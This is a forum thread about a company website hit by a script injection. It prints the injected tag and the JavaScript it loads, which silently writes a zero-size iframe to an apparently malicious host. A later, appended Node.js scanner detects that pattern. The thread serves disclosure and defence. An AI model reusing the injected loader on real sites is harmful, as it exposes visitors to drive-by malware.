Website management fun! or not...

CJones

I went to check on one of my company's sites, and it was taking longer than normal to respond. I paid attention to the status messages at the bottom of the browser and noticed that it was reading something from news.212cafe.com. Weird. Look at the page source once the page loads, and the following line is at the very top of the page (even before the <html> tag):
Code:
<script src=http://news.212cafe.com/images/j.js></script>
Uh oh. Not good. I pulled up the .js file and it contains the following:
Code:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
window.status=' ';
document.write("<iframe src=\"http://m.winxyz.com\" width=0 height=0></ifame>");
}
}Get();


The 'm.winxyz.com' site won't come up as it appears malicious, but I can only assume that they are NOT trying to post pictures of cute puppies on my site.

I've submitted a ticket to our web host (networksolutions) and the site is down right now, hopefully so they can investigate any security breaches.

Anyone else seeing this hack recently, or am I just a lucky one?
 
Yep. It also appears that our web host has had issues with these types of attacks in the past. Something about how they have their shared servers set up allows hackers who hack into one site to gain access to all sites on the server.

About 10 minutes after I submitted a support ticket to them, our site and our database server were down. The site has been at various stages of up-and-down ever since then.

Luckily, we don't store any 'sensitive' data on our site - all information we store is public access to begin with. I'll still be changing our admin passwords as soon as the site is back up.

We were wanting to change hosts already, but this little fiasco might have bumped our time-frame up a bit.
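
Added example (not part of the original posts): a small Node.js check for the three markers described in the first post, namely markup ahead of the <html> tag, a script loaded from an unexpected host, and a zero-size iframe. The names scanPage and hostOf, the allowlist and the .example hostnames are assumptions, and the sample pages are constructed.

```javascript
// Static checks for the injection pattern described in this thread.
// Hostnames and sample pages below are constructed for illustration.

// Return the hostname of an absolute or protocol-relative URL, or null for a relative one.
function hostOf(src) {
  const m = /^(?:https?:)?\/\/([^\/:?#]+)/i.exec(src);
  return m ? m[1].toLowerCase() : null;
}

// Scan HTML (or the body of a fetched .js file) and return a list of findings.
function scanPage(text, allowedHosts) {
  const findings = [];
  const allowed = new Set(allowedHosts.map(h => h.toLowerCase()));

  // 1. Anything other than whitespace or comments before the doctype or <html> tag.
  const start = text.search(/<!doctype\b|<html\b/i);
  if (start > 0) {
    const prefix = text.slice(0, start).replace(/<!--[\s\S]*?-->/g, '').trim();
    if (prefix) findings.push({ rule: 'content-before-html', detail: prefix.slice(0, 80) });
  }

  // 2. <script src=...> loading from a host that is not on the allowlist.
  const scriptRe = /<script\b[^>]*?\bsrc\s*=\s*\\?["']?([^\s"'>\\]+)/gi;
  for (const m of text.matchAll(scriptRe)) {
    const host = hostOf(m[1]);
    if (host && !allowed.has(host)) findings.push({ rule: 'external-script', detail: host });
  }

  // 3. Zero-sized iframes, including ones inside a document.write() string with \" quoting.
  const iframeRe = /<iframe\b[^>]*?\b(?:width|height)\s*=\s*\\?["']?0(?![\d.%])[^>]*>/gi;
  for (const m of text.matchAll(iframeRe)) {
    const src = /\bsrc\s*=\s*\\?["']?([^\s"'>\\]+)/i.exec(m[0]);
    findings.push({ rule: 'hidden-iframe', detail: src ? src[1] : '(no src)' });
  }
  return findings;
}

// Constructed samples mirroring the thread: a script tag ahead of <html>, and a loader script.
const infectedPage = '<script src=http://cdn.injected.example/images/j.js></script>\n' +
  '<html><head><script src="/js/site.js"></script></head><body>Hello</body></html>';
const loaderJs = 'document.write("<iframe src=\\"http://m.injected.example\\" width=0 height=0></ifame>");';
const cleanPage = '<!DOCTYPE html>\n<html><head><script src="https://www.mysite.example/app.js"></script></head></html>';

console.log(scanPage(infectedPage, ['www.mysite.example']));
console.log(scanPage(loaderJs, ['www.mysite.example']));
console.log(scanPage(cleanPage, ['www.mysite.example']));
```

Running it over every page on a shared host, and over any script those pages load, shows whether the same tag was added to other sites on the server.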
 